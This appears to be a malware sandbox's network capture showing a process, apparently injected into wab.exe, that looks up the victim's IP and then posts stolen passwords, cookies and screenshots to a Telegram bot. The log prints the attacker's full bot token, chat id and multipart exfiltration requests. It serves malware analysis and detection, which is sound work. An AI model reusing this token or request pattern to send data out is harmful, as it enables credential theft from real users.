                                                                2024-03-15 11:36:27 UTC8000INData Raw: 12 cb d2 3b 35 79 50 3d ee 3b 74 5b 4e 14 00 73 47 b5 8e 96 d1 52 f1 06 98 62 1f c9 81 d7 00 61 86 45 89 86 34 67 b6 4e 56 a2 4a 79 f6 bf 6d e5 e3 d2 bf 11 ce 72 08 0a 49 5a 9c a6 f5 fb c9 7b 51 4e 7a 61 9b 93 63 4f 59 c7 e8 23 29 62 f5 78 cf 8a f6 3e fa 72 e9 7a 72 b1 fa 0f a2 d1 d9 55 72 c6 21 3d f5 5f c6 97 25 6a 88 86 0e a2 f9 ac a2 ef 79 1e 57 e5 b2 9d 5f dc 70 dc 16 16 a8 e2 ff ff 53 fa 18 72 c9 e6 01 bd ba 2b b5 6f 24 57 d8 db 87 77 26 40 fb 10 53 63 2f 26 bf 37 10 e1 33 8b 19 3d 3f 15 eb cd a9 c2 db f7 45 88 de 3d 4f 77 34 79 9c 4d 0b 60 57 ff aa 18 72 84 79 c2 6a 9a 21 f8 78 e1 83 53 67 bd 50 e2 d2 1e 56 88 02 12 f5 48 8c 99 aa 09 85 96 a3 fc 5d f8 58 ae da 2d 48 6b 14 2e be 05 e1 e0 a0 51 6f 46 e5 ba c0 01 47 b7 2a 98 b4 8e 39 57 10 31 81 11 9a
                                                                Data Ascii: ;5yP=;t[NsGRbaE4gNVJymrIZ{QNzacOY#)bx>rzrUr!=_%jyW_pSr+o$Ww&@Sc/&73=?E=Ow4yM`Wryj!xSgPVH]X-Hk.QoFG*9W1
                                                                2024-03-15 11:36:27 UTC8000INData Raw: 54 1f 90 06 f7 18 7e 14 27 64 62 7e 41 34 be 5c 4c 57 0b db 06 96 25 cd 7e 1c 79 11 47 d9 21 5e c0 76 2c 60 16 59 51 7c 39 71 6a 2e 45 2f 79 25 aa f0 83 e2 cd 48 1c 89 ec e2 d3 1f 6d 65 42 fc ec 4a 53 f8 6e da 79 e8 8e 39 d0 e0 02 46 7c 35 a9 5c b7 ac f9 1a 22 18 04 b1 09 8a 10 72 ab 9f 3c 00 9d 3d aa 51 dd a7 12 61 47 bb d6 a8 37 9c 25 e8 c6 29 8e c3 0f a6 cd 54 b8 7b e7 99 24 71 a7 96 3c 0f 5c 60 ab be a9 3e c9 48 4c 2f 55 e2 51 a3 c1 e2 bc 24 8b e4 b6 35 67 78 5d 3f cd 19 ff fd 86 94 bf 20 49 97 ec 4f 0e 16 a0 43 30 70 3b 47 94 4d a4 2b 26 b0 24 0f fb 83 5d 6d 45 b8 bc 05 da 9d ff 31 20 ab 9b 78 91 9e 13 a2 25 1c ec 8a 4d 9c be b7 b9 16 53 0e 68 ec 1a 2d aa b9 6e 18 d0 af 9a 01 f5 96 25 70 95 ec ec 65 97 91 6b e5 d0 eb ab 2f 14 07 99 fe 14 f3 ff 57 06
                                                                Data Ascii: T~'db~A4\LW%~yG!^v,`YQ|9qj.E/y%HmeBJSny9F|5\"r<=QaG7%)T{$q<\`>HL/UQ$5gx]? IOC0p;GM+&$]mE1 x%MSh-n%pek/W
                                                                2024-03-15 11:36:27 UTC8000INData Raw: ef e3 f8 03 06 f5 51 e4 b8 66 b7 9f 2e e3 e5 18 08 6f 2a 48 ac f3 86 eb 60 42 30 75 74 00 76 2e eb d0 5d cd f6 da 39 0b e8 33 5d e8 ee 05 80 39 bf 33 38 2f 1a 48 bc aa 5f 4e 5e ae 4e cd 2d 51 ae fe d2 14 98 a1 db c4 34 6d 21 6f f8 4c 59 7d 3b e3 b2 06 b4 d3 4d d0 ce 43 fc d8 19 9b c1 eb b0 ca 9f 78 32 a6 65 c7 a7 42 ab 3b 01 cf a3 a5 7e c3 b5 d4 e9 40 b8 f6 68 22 f3 5a 03 2d 6e c1 e4 3b 9c 43 b6 bd e1 67 24 07 09 08 9d 14 47 de 20 36 a1 e2 fb fc c5 bb 67 1e 05 cf 56 08 68 11 ed e6 1b 18 95 6c 66 67 87 78 85 77 44 37 f9 c6 e9 a7 ef e4 c0 86 13 53 3a 4d 28 db 91 70 ca d4 e6 b0 4f 69 a4 94 31 2d 74 2a 5d 52 bb 7f fe cf e2 75 b8 06 c8 67 12 ad 4b 07 a2 70 08 12 3b cc 3e 9a bd 7d 41 b8 c8 f6 bc 3c bb 80 b1 a1 f0 39 0f e9 d4 ef 14 34 0c 99 21 66 95 ec 65 d0 6a
                                                                Data Ascii: Qf.o*H`B0utv.]93]938/H_N^N-Q4m!oLY};MCx2eB;~@h"Z-n;Cg$G 6gVhlfgxwD7S:M(pOi1-t*]RugKp;>}A<94!fej
                                                                2024-03-15 11:36:27 UTC8000INData Raw: 46 eb 55 2d 2c 69 1e 88 d7 6d d3 e0 04 77 f6 06 67 c5 43 2a da 7f fb 78 fc 79 4a d0 c0 68 04 19 de 2b ec 2e 0e fb 72 ec 14 48 99 d9 62 9e 3d 64 9f fb 47 b3 28 2f 6a 56 cd 13 a7 0b 2f 6d bb 86 95 1f d5 3b 92 44 9c 8e af f2 94 a4 45 26 fa 9b 32 f7 ed b1 e8 13 a3 b2 68 86 0f 19 13 17 9f fb 38 2c c7 47 cd c5 d7 a1 f2 67 b4 93 a2 dc cf 16 d4 72 e4 76 c9 5d 71 fa 8d 66 3a 01 e9 93 47 ec 3b d3 15 56 ea 45 29 07 49 c5 2d 7e c3 eb a6 bc 6a 92 02 e9 69 98 98 d2 6a 23 47 97 84 a1 d1 c2 12 50 9d de eb 0e b8 16 bd fa d3 82 b6 c1 d6 5d 68 e7 f5 52 2e 2c 57 16 30 38 bf 9f 74 c7 91 33 3d d2 09 11 57 16 18 5c 95 bf 32 95 bf 31 0c a3 64 fe 5c ea e5 b9 3a 30 69 41 6e 12 03 c0 e8 bd 85 23 ba 2a e2 59 d1 37 cd 8b 3f d1 ae b9 5d 9c ee ca 20 a8 83 d7 81 4f b6 a3 f2 0a 0b c2 09
                                                                Data Ascii: FU-,imwgC*xyJh+.rHb=dG(/jV/m;DE&2h8,Ggrv]qf:G;VE)I-~jij#GP]hR.,W08t3=W\21d\:0iAn#*Y7?] O


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549715104.26.13.2054434400C:\Program Files (x86)\Windows Mail\wab.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-15 11:36:28 UTC155OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                Host: api.ipify.org
                                                                Connection: Keep-Alive
                                                                2024-03-15 11:36:30 UTC211INHTTP/1.1 200 OK
                                                                Date: Fri, 15 Mar 2024 11:36:30 GMT
                                                                Content-Type: text/plain
                                                                Content-Length: 14
                                                                Connection: close
                                                                Vary: Origin
                                                                CF-Cache-Status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 864c34bcb9e143aa-EWR
                                                                2024-03-15 11:36:30 UTC14INData Raw: 31 39 31 2e 39 36 2e 32 32 37 2e 31 39 34
                                                                Data Ascii: 191.96.227.194


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549716149.154.167.2204434400C:\Program Files (x86)\Windows Mail\wab.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-15 11:36:33 UTC260OUTPOST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=---------------------------8dc44ec8b632084
                                                                Host: api.telegram.org
                                                                Content-Length: 975
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                2024-03-15 11:36:34 UTC25INHTTP/1.1 100 Continue
                                                                2024-03-15 11:36:34 UTC975OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 38 62 36 33 32 30 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 38 62 36 33 32 30 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 35 2f 32 30 32 34 20 31 32 3a 33 36 3a 33 32 0a 55 73 65 72
                                                                Data Ascii: -----------------------------8dc44ec8b632084Content-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc44ec8b632084Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/15/2024 12:36:32User
                                                                2024-03-15 11:36:34 UTC1130INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0
                                                                Date: Fri, 15 Mar 2024 11:36:34 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 742
                                                                Connection: close
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                {"ok":true,"result":{"message_id":157,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502594,"document":{"file_name":"user-302494 2024-03-15 12-36-32.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAOdZfQywj3tO_lE_y2HCJrcGxs3gmgAAu0RAALnDKBTielMk8twmoA0BA","file_unique_id":"AgAD7REAAucMoFM","file_size":350},"caption":"New PW Recovered!\n\nTime: 03/15/2024 12:36:32\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.549717149.154.167.2204434400C:\Program Files (x86)\Windows Mail\wab.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-15 11:36:34 UTC236OUTPOST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=---------------------------8dc44fbe5c2a9f0
                                                                Host: api.telegram.org
                                                                Content-Length: 914
                                                                Expect: 100-continue
                                                                2024-03-15 11:36:35 UTC25INHTTP/1.1 100 Continue
                                                                2024-03-15 11:36:35 UTC914OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 66 62 65 35 63 32 61 39 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 66 62 65 35 63 32 61 39 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 35 2f 32 30 32 34 20 31 34 3a 32 36 3a 32 36 0a 55 73 65 72
                                                                Data Ascii: -----------------------------8dc44fbe5c2a9f0Content-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc44fbe5c2a9f0Content-Disposition: form-data; name="caption"New CO Recovered!Time: 03/15/2024 14:26:26User
                                                                2024-03-15 11:36:35 UTC1130INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0
                                                                Date: Fri, 15 Mar 2024 11:36:35 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 742
                                                                Connection: close
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                {"ok":true,"result":{"message_id":158,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502595,"document":{"file_name":"user-302494 2024-03-15 14-26-26.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAOeZfQyw7q6uZl_OY_S70MutPG2k3oAAu4RAALnDKBTRtP76-bHmvo0BA","file_unique_id":"AgAD7hEAAucMoFM","file_size":289},"caption":"New CO Recovered!\n\nTime: 03/15/2024 14:26:26\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549720149.154.167.2204434400C:\Program Files (x86)\Windows Mail\wab.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-15 11:38:00 UTC238OUTPOST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=---------------------------8dc5150fe3e9d7a
                                                                Host: api.telegram.org
                                                                Content-Length: 67189
                                                                Expect: 100-continue
                                                                2024-03-15 11:38:00 UTC25INHTTP/1.1 100 Continue
                                                                2024-03-15 11:38:00 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 31 35 30 66 65 33 65 39 64 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 31 35 30 66 65 33 65 39 64 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 33 31 2f 32 30 32 34 20 30 36 3a 34 35 3a 34 38 0a 55 73 65 72
                                                                Data Ascii: -----------------------------8dc5150fe3e9d7aContent-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc5150fe3e9d7aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/31/2024 06:45:48User
                                                                2024-03-15 11:38:00 UTC16355OUTData Raw: 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c
                                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                2024-03-15 11:38:00 UTC16355OUTData Raw: 5c 8f 88 2f 20 be d7 bc cb 69 04 91 c7 00 42 eb c8 ce e2 7f ad 67 79 31 7f cf 24 ff 00 be 45 39 55 54 61 40 03 d0 56 94 b0 33 8d 45 29 49 59 19 d6 cd 68 3a 33 85 38 bb c9 5b 5b 0b 45 14 57 aa 7c f0 51 45 14 01 6b 4b 65 4d 52 d5 98 85 51 2a 92 49 c0 03 35 dc 7d ba cf fe 7e e0 ff 00 bf 8b fe 35 e7 b4 57 1d 7c 2f b6 97 35 ec 7a 18 5c 77 d5 e0 e1 cb 7d 7b 9e 85 f6 fb 2f f9 fc b7 ff 00 bf ab fe 34 9f 6f b2 ff 00 9f cb 7f fb fa bf e3 5e 7d 45 61 fd 9f fd ef c3 fe 09 d3 fd ab fd cf c7 fe 01 d4 f8 9e ea da 6d 35 12 1b 88 a4 6f 34 1c 23 82 71 83 e9 5c ad 14 57 66 1e 8f b1 8f 2d ee 70 62 b1 1f 58 9a 95 ad a0 51 45 15 b9 cc 14 51 45 00 14 51 45 00 14 94 b4 50 02 51 4b 49 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 14 50 30 a2 8a 29 80 94 52 d1 40 09 45 14 b4 00 94
                                                                Data Ascii: \/ iBgy1$E9UTa@V3E)IYh:38[[EW|QEkKeMRQ*I5}~5W|/5z\w}{/4o^}Eam5o4#q\Wf-pbXQEQEQEPQKI@Q@Q@Q@EP0)R@E
                                                                2024-03-15 11:38:00 UTC16355OUTData Raw: ac d2 ea 16 ca 38 cf 3d bd 41 af 38 d4 b5 49 6f a0 b5 b7 e5 61 b7 89 50 2f a9 00 02 69 fa 4e a2 d6 d1 cf 67 24 85 6d ae 54 ab 10 7e e1 c7 0d fe 3e d5 84 b0 4d c5 cb af e8 7a 51 c6 a5 25 1e 96 fc 4f 40 bd 39 ba d3 88 ff 00 9e e7 ff 00 45 49 5c b7 88 bf e4 35 3f d1 7f f4 11 52 78 7b 53 92 69 ec b4 db 8c 99 6d e6 6d a7 fd 91 1b 8c 7e 19 a8 fc 45 ff 00 21 a9 ff 00 e0 3f fa 08 a5 42 9b a7 59 45 f6 33 c6 54 55 30 ce 4b ba 33 28 a2 8a f5 0f 00 28 a2 8a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 25 14 b4 50 02 51 4b 45 00 25 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 2d 14 0c 4a 28 a2 98 09 45 2d 25 00 14 51 45 03 12 8a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 61 49 4b 49 40 05 25 3b b5 25 00 25 14 b4 94 0c 29 29 68 a0 04 a2 96 92 80 12 8a 5a
                                                                Data Ascii: 8=A8IoaP/iNg$mT~>MzQ%O@9EI\5?Rx{Simm~E!?BYE3TU0K3(((QEQE%PQKE%Q@Q@Q@Q@Q@E-J(E-%QEZ((((aIKI@%;%%))hZ
                                                                2024-03-15 11:38:00 UTC15447OUTData Raw: 06 db db 6e 3b d6 71 cc 30 d2 92 8a 96 af c9 ff 00 91 a4 b2 ec 4c 62 e4 e3 a2 f3 5f e6 65 d1 45 15 da 70 85 14 51 40 05 14 51 40 05 15 d5 db f8 7a c6 5b 68 a4 63 28 2e 81 8e 1b d4 7d 2a 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 6d 68 3a 65 be a1 1c c6 7d e0 a1 18 da 71 d7 35 9d 5a 8a 94 79 99 bd 0a 12 af 3e 48 ee 62 d1 5d 7f fc 23 76 1f de 9b fe fa 1f e1 49 ff 00 08 dd 87 f7 a6 ff 00 be 87 f8 57 2f d7 a9 f6 7f d7 cc ee fe ca ad dd 7e 3f e4 72 34 56 e5 fe 86 b1 a4 cd 68 59 8c 4d 82 ac 72 48 da 0f f5 ac 3e 95 d1 4a b4 6a ab c4 e3 c4 61
                                                                Data Ascii: n;q0Lb_eEpQ@Q@z[hc(.}*OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEmh:e}q5Zy>Hb]#vIW/~?r4VhYMrH>Jja
                                                                2024-03-15 11:38:00 UTC1603OUTData Raw: aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1
                                                                Data Ascii: B$}<B$}<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,
                                                                2024-03-15 11:38:00 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 31 35 30 66 65 33 65 39 64 37 61 2d 2d 0d 0a
                                                                Data Ascii: -----------------------------8dc5150fe3e9d7a--
                                                                2024-03-15 11:38:01 UTC1493INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0
                                                                Date: Fri, 15 Mar 2024 11:38:00 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 1104
                                                                Connection: close
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                {"ok":true,"result":{"message_id":162,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502680,"document":{"file_name":"user-302494 2024-03-31 07-05-48.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAA6Jl9DMYoSOWDPjycY9AxUWGA6vyvwAC8xEAAucMoFOjre0JMb-FOQEAB20AAzQE","file_unique_id":"AQAD8xEAAucMoFNy","file_size":12486,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAA6Jl9DMYoSOWDPjycY9AxUWGA6vyvwAC8xEAAucMoFOjre0JMb-FOQEAB20AAzQE","file_unique_id":"AQAD8xEAAucMoFNy","file_size":12486,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOiZfQzGKEjlgz48nGPQMVFhgOr8r8AAvMRAALnDKBTo63tCTG_hTk0BA","file_unique_id":"AgAD8xEAAucMoFM","file_size":66564},"caption":"New SC Recovered!\n\nTime: 03/31/2024 06:45:48\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.549721149.154.167.2204434400C:\Program Files (x86)\Windows Mail\wab.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-15 11:38:00 UTC238OUTPOST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=---------------------------8dc531643bd24a9
                                                                Host: api.telegram.org
                                                                Content-Length: 67189
                                                                Expect: 100-continue
                                                                2024-03-15 11:38:00 UTC25INHTTP/1.1 100 Continue
                                                                2024-03-15 11:38:00 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 33 31 36 34 33 62 64 32 34 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 33 31 36 34 33 62 64 32 34 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 30 32 2f 32 30 32 34 20 31 32 3a 34 30 3a 32 37 0a 55 73 65 72
                                                                Data Ascii: -----------------------------8dc531643bd24a9Content-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc531643bd24a9Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/02/2024 12:40:27User
                                                                2024-03-15 11:38:00 UTC16355OUTData Raw: 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c
                                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
